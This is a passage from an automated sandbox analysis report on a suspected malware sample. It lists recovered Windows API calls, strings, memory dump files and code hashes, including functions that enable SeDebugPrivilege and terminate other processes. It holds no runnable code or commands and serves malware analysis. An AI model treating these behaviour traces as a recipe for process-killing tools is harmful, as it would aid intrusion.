                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00EC9BDD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      • API String ID: 2014098862-0
                      • Opcode ID: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                      • Instruction ID: 424d0f42d744776db48f8e2b8a8d0eb74869b71f3ac4c99125d0f1928c0366f9
                      • Opcode Fuzzy Hash: b4a789889ab1945b7c4fefce8cd6ac2aa069068dffe34d7c96f40b10b10a9257
                      • Instruction Fuzzy Hash: F3112172900208BEF7106B22DC8DFAA3B2CEF8C755F110429F204BB0A1C9F35C51DAA4
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E0C
                      • HeapAlloc.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E13
                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E28
                      • GetCurrentProcess.KERNEL32(?,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E30
                      • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E33
                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00EC8A84,00000B00,?,?), ref: 00EC8E43
                      • GetCurrentProcess.KERNEL32(00EC8A84,00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4B
                      • DuplicateHandle.KERNEL32(00000000,?,00EC8A84,00000B00,?,?), ref: 00EC8E4E
                      • CreateThread.KERNEL32(00000000,00000000,00EC8E74,00000000,00000000,00000000), ref: 00EC8E68
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                      • String ID:
                      • API String ID: 1957940570-0
                      • Opcode ID: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                      • Instruction ID: 08f2421a0396cff254ee8a32df7807bcdd7efa2e4ad3d51e0b2b1a4eff7567f0
                      • Opcode Fuzzy Hash: 87cc7c7e1d2890e38dc370deb3e7cb0a7a9c3f5809e0a5b5aba462e9022f2f6f
                      • Instruction Fuzzy Hash: 1001AC75641304FFE610AB65DD89F673B6CEF89711F404421FA05EB2A2CA71D814CA20
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$_memset
                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                      • API String ID: 2862541840-625585964
                      • Opcode ID: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                      • Instruction ID: 4b852b4fbefcd46ecedf91398f8bc85c687b44140fbbdb395eed8c0c3ead1992
                      • Opcode Fuzzy Hash: 96aab9ddc18cf2c4b5af86471c9e47052bfc8cc86074c783457e66376f7f9606
                      • Instruction Fuzzy Hash: 1091BD71A00259ABDF24DFA6C848FAEB7F8EF85314F10915AF515BB282D7709905CFA0
                      APIs
                        • Part of subcall function 00EC7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?,?,00EC799D), ref: 00EC766F
                        • Part of subcall function 00EC7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC768A
                        • Part of subcall function 00EC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?,?), ref: 00EC7698
                        • Part of subcall function 00EC7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00EC758C,80070057,?), ref: 00EC76A8
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EE9B1B
                      • _memset.LIBCMT ref: 00EE9B28
                      • _memset.LIBCMT ref: 00EE9C6B
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00EE9C97
                      • CoTaskMemFree.OLE32(?), ref: 00EE9CA2
                      Strings
                      • NULL Pointer assignment, xrefs: 00EE9CF0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                      • String ID: NULL Pointer assignment
                      • API String ID: 1300414916-2785691316
                      • Opcode ID: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                      • Instruction ID: 0a70f6d2744ff386f9ed364ebc4fe0e3838d73fabbbb82c35b7c4bb0e50e81a4
                      • Opcode Fuzzy Hash: fec4252f05666f638615e22035c4e3f54c67176b0e70eb34cb47b09474515f0f
                      • Instruction Fuzzy Hash: 3D912771D0022DABDB10DFA5DC85ADEBBF8EF08710F20916AE519B7241DB719A45CFA0
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EF7093
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EF70A7
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF70C1
                      • _wcscat.LIBCMT ref: 00EF711C
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EF7133
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF7161
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      • API String ID: 307300125-78025650
                      • Opcode ID: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                      • Instruction ID: 5072cb75653128cc2ba8f077a9be24cc1f5234b9452aa5f6c9d047562ada2442
                      • Opcode Fuzzy Hash: 883bb713ecfedd1da34efdb3bd73e45d50590a1528e068268d8dfbe84a303baf
                      • Instruction Fuzzy Hash: 64417071A04308AFDB219F64CC85BFA77E8EF08354F10556AFA84E6191D6719D848B60
                      APIs
                        • Part of subcall function 00ED3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00ED3EB6
                        • Part of subcall function 00ED3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00ED3EC4
                        • Part of subcall function 00ED3E91: CloseHandle.KERNEL32(00000000), ref: 00ED3F8E
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECB8
                      • GetLastError.KERNEL32 ref: 00EEECCB
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EEECFA
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EEED77
                      • GetLastError.KERNEL32(00000000), ref: 00EEED82
                      • CloseHandle.KERNEL32(00000000), ref: 00EEEDB7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
                      • Instruction ID: e2c6d2e42080952b5e1402f9c0fac3727fe1c3c7dcf371ea86bae430c12ba8fd
                      • Opcode Fuzzy Hash: 7c03ccd9cb271d1462a502d409fb75e4d0e2c1408289e754b5c030e8043ba719
                      • Instruction Fuzzy Hash: 1141AB712002019FDB15EF25CC95F6EB7E1AF80714F089469F94AAB3C3DB75A815CB92
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00ED32C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
                      • Instruction ID: 4549dc2972f6246236d288e5234d31fb2389f6bc8b3e786d3c879fc8c114cac5
                      • Opcode Fuzzy Hash: 144d083dfb4fa72c46d520cd74cc34e4f848d6580361b5ab64cbd3bfbe3b1d82
                      • Instruction Fuzzy Hash: 1F112B31A09356BB9B016A75EC42CAFB3DCDF19374F20102BF900B63D1D6629B4249A7
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ED454E
                      • LoadStringW.USER32(00000000), ref: 00ED4555
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ED456B
                      • LoadStringW.USER32(00000000), ref: 00ED4572
                      • _wprintf.LIBCMT ref: 00ED4598
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ED45B6
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00ED4593
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
                      • Instruction ID: 0840431548fad70f372b8799bb3a96a8c20c97cd0b11b8509949544ce96f5442
                      • Opcode Fuzzy Hash: 57b70a8f797d46120376b2bf99cab0526df55580e1149a46a70bdde0ca124610
                      • Instruction Fuzzy Hash: 2E0162F2900208BFE710A7A1DD89EF7776CDB48301F0005A6FB45F2151EA749E898B75
                      APIs
                        • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • GetSystemMetrics.USER32(0000000F), ref: 00EFD78A
                      • GetSystemMetrics.USER32(0000000F), ref: 00EFD7AA
                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EFD9E5
                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EFDA03
                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EFDA24
                      • ShowWindow.USER32(00000003,00000000), ref: 00EFDA43
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00EFDA68
                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00EFDA8B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                      • String ID:
                      • API String ID: 1211466189-0
                      • Opcode ID: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
                      • Instruction ID: b9d7907568b6ba913e1020e182c43734e5e26755e0263310c7f4dd1a31159e4a
                      • Opcode Fuzzy Hash: 22efa1e3d1f47d406cd98390961be6dc58d596c56c32374a23e6511e44d3ab61
                      • Instruction Fuzzy Hash: 64B1BA31604219EFCF18CF69C9857BD7BB2BF48714F08D069EE48AB295D770A950CB90
                      APIs
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00E72ACF
                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E72B17
                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC46A
                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EAC417,00000004,00000000,00000000,00000000), ref: 00EAC4D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      • Opcode ID: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
                      • Instruction ID: a9ec7e693af6e421d58286894815c2d1f96bc793dabf10650e11d62d99209af3
                      • Opcode Fuzzy Hash: a9f37a0b5a93036492b25f64715c4d41485f5f817502741a6cb46dd64cfe5a39
                      • Instruction Fuzzy Hash: 78415D30608781AEC7358B29CC9D7BB7BD2AF8E314F28E41DE25FBA560C635A845D710
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ED737F
                        • Part of subcall function 00E90FF6: std::exception::exception.LIBCMT ref: 00E9102C
                        • Part of subcall function 00E90FF6: __CxxThrowException@8.LIBCMT ref: 00E91041
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ED73B6
                      • EnterCriticalSection.KERNEL32(?), ref: 00ED73D2
                      • _memmove.LIBCMT ref: 00ED7420
                      • _memmove.LIBCMT ref: 00ED743D
                      • LeaveCriticalSection.KERNEL32(?), ref: 00ED744C
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ED7461
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ED7480
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      • API String ID: 256516436-0
                      • Opcode ID: c40224006e5cea2d4f199224ad69fbf190dfc3aead343c551dfe7497cfe6f824
                      • Instruction ID: fa107e45891e97969ae746f585fb6743dc15f2bbd118ae7660c0b2451053ef53
                      • Opcode Fuzzy Hash: c40224006e5cea2d4f199224ad69fbf190dfc3aead343c551dfe7497cfe6f824
                      • Instruction Fuzzy Hash: FC31CF31A04205EFDF10DF65DC85AAEBBB8EF84700B1441B6F904BB256DB319A15DBA0
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00EF645A
                      • GetDC.USER32(00000000), ref: 00EF6462
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF646D
                      • ReleaseDC.USER32(00000000,00000000), ref: 00EF6479
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EF64B5
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EF64C6
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EF9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00EF6500
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EF6520
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      • Opcode ID: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
                      • Instruction ID: 2aa17b12f3aae86ce9f8507d34df2b187565bfa860e2cfe1920bd7f2e14c5033
                      • Opcode Fuzzy Hash: fc2be265f3d83ec81e1f045e68346e7ae14745fcfa61af08a7fd21aad3f86281
                      • Instruction Fuzzy Hash: AB315C72201214BFEF118F51CC8AFBA3BA9EF49765F044065FE08EA295DA759841CBA4
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
                      • Instruction ID: ad555dfbc51c5e15260ec065fdf2ad8f148c798bde1a787f336948b8ebe208e1
                      • Opcode Fuzzy Hash: e4d46b092a9cfa58f39d84ce332f967d92186eeac4a0175bab12e36252a4cfdd
                      • Instruction Fuzzy Hash: 5421AD62A01206B7DA55A5214E47FAF33DC9F103A8F286019FE0DB62C3E752DD12A1B6
                      APIs
                        • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                        • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                        • Part of subcall function 00E8FEC6: _wcscpy.LIBCMT ref: 00E8FEE9
                      • _wcstok.LIBCMT ref: 00EDEEFF
                      • _wcscpy.LIBCMT ref: 00EDEF8E
                      • _memset.LIBCMT ref: 00EDEFC1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      • API String ID: 774024439-3081909835
                      • Opcode ID: a55031522e25ecf2049b63df92bf237fa036594f7243b076209128603ef3a63b
                      • Instruction ID: a384de9f099a05da45c90d98d974660744f35afbe4e55806ba9cfdcfd1af38a7
                      • Opcode Fuzzy Hash: a55031522e25ecf2049b63df92bf237fa036594f7243b076209128603ef3a63b
                      • Instruction Fuzzy Hash: F9C173715083009FC714EF24C885A5AB7E4FF84314F14996EF99AAB3A2DB70ED45CB82
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
                      • Instruction ID: b9c70198f27b0c4c0a1cd9a01a650a25b6716a48e356fe4a55314954c889fee9
                      • Opcode Fuzzy Hash: c02d9a802bed18e8786bb019c019f5e918ddf5492e097401d2d916076380b7a3
                      • Instruction Fuzzy Hash: 6B715D30900219EFCB14CF59CC45ABEBBB9FF86314F14C199F919BA252D734AA51CB60
                      Memory Dump Source
                      • Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                      • Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2f638b3e69713b4400018e663cda446c29925dba598e6554ce7226a7aa9da550
                      • Instruction ID: 27a72d6330f12ecb1740931e7c8b72963b84762b216491e4647d6bfbf4f984bb
                      • Opcode Fuzzy Hash: 2f638b3e69713b4400018e663cda446c29925dba598e6554ce7226a7aa9da550
                      • Instruction Fuzzy Hash: 5961CC32508344AFC710EB25CC85E6FB7E9EF84714F10A91DF58AA72A2DB709D05CB92
